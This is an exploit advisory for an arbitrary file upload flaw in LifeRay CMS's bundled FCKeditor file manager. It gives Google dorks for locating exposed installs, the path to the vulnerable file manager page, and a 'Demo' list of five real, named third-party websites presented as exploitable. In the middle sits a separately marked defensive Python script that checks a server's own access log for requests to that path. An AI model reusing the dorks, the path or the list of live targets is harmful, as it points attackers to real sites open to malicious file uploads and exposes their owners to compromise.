[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category : Web Application Bugs
[+] Dork : inurl:/web/guest/
           inurl:/html/js/editor/fckeditor/

### Notes:

Through its bundled FCKeditor file manager, LifeRay allows an attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications.


### POC:

[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
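
Added example (not part of the original advisory): a check a site owner can run over their own web server access log to see whether the file manager path from the POC is being requested and whether the server answers it. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Path prefix taken from the advisory's POC URL.
FILEMANAGER_PREFIX = "/html/js/editor/fckeditor/editor/filemanager/"
# Assumption: the access log uses the Apache/Nginx "combined" format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, decode %xx, collapse '//' and '.', lower-case."""
    path = unquote(target.split("?", 1)[0])
    path = posixpath.normpath(re.sub(r"/+", "/", path))
    return path.lower()

def find_filemanager_hits(lines):
    """Return {client_ip: [(timestamp, method, path, status, served)]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize(m["target"])
        if not path.startswith(FILEMANAGER_PREFIX):
            continue
        status = int(m["status"])
        served = 200 <= status < 300  # 2xx: the file manager answered
        hits[m["ip"]].append((m["ts"], m["method"], path, status, served))
    return dict(hits)

def exposed_clients(hits):
    """Clients that received at least one 2xx response from the file manager."""
    return sorted(ip for ip, rows in hits.items() if any(r[4] for r in rows))

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2020:10:01:02 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Apr/2020:10:01:09 +0000] "GET /HTML/js//editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Apr/2020:11:15:40 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 403 199 "-" "curl/7.68.0"',
    '192.0.2.44 - - [10/Apr/2020:11:20:00 +0000] "GET /web/guest/home HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(exposed_clients(find_filemanager_hits(SAMPLE_LOG)))
```

Any client listed by `exposed_clients` received the file manager page; a 403 or 404 for the same path indicates the path is blocked or absent on that server.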

### Demo:

[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html


### Special Thanks:

* Po0ri4 & b4ckdo0r 


### Contact Me :

* Telegram : @h4shur
* Email : h4shursec@gmail.com
* Instagram : @netedit0r
* twitter : @h4shur